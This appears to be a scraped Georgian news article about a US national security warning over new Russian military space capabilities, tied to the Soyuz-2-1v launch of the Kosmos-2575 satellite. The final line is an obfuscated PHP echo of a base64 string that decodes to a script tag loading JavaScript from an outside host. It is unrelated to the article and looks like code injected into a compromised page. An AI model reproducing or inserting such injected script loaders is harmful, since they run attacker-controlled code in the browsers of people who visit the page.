celsiusi
ავერსი საქკაბელი

ვრცელდება ინფორმაცია, რომ ამერიკის დაზვერვის მიერ მოპოვებული საიდუმლო ინფორმაცია დაკავშირებულია უცხო სახელმწიფოს „ მადესტაბილიზებელ სამხედრო შესაძლებლობებთან“ .

ამერიკის პრეზიდენტის, ჯო ბაიდენის მრჩეველმა, ეროვნული უსაფრთხოების საკითხებში, ჯეიკ სალივანმა განაცხადა, რომ აღნიშნულ ეროვნული უსაფრთხოების საფრთხესთან დაკავშირებით შეიკრიბებიან სენატისა და წარმომადგენელთა პალატის ორივე პარტიის ლიდერი და ასევე ეროვნული უშიშროების საბჭოს წევრები.

ამერიკის ცენტრალური სადაზვერვოს სააგენტოს ( CIA) მაღალჩინოსნებმა CNN-ს განუცხადეს, რომ ეროვნული უსაფრთხოების საფრთხე არის უაღრესად შემაშფოთებელი და მადესტაბილიზებელი, რომელიც მომდინარეობს რუსეთის შეიარაღებული ძალებისგან.

აშშ-ის თავდაცვის ოფიციალურმა წარმომადგენლებმა დაადასტურეს, რომ „ეროვნული უსაფრთხოების საფრთხე“ დაკავშირებულია რუსეთის სამხედრო ძალების ახალ კოსმოსურ შესაძლებლობებთან.

შეგახსენებთ, რომ 5 დღის წინ რუსეთმა კოსმოსში გაუშვა რაკეტა Soyuz-2-1v, რომელიც ატარებდა საიდუმლო ტვირთს თავდაცვის სამინისტროსთვის. თანამგზავრი Kosmos-2575 ახლა ორბიტაზეა და რუსეთის საჰაერო და კოსმოსური ძალების კონტროლის ქვეშ იმყოფება.
 
 ამჟამად უცნობია თუ რა სახის კოსმოსურ სამხედრო შესაძლებლობებზეა საუბარი.
353
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");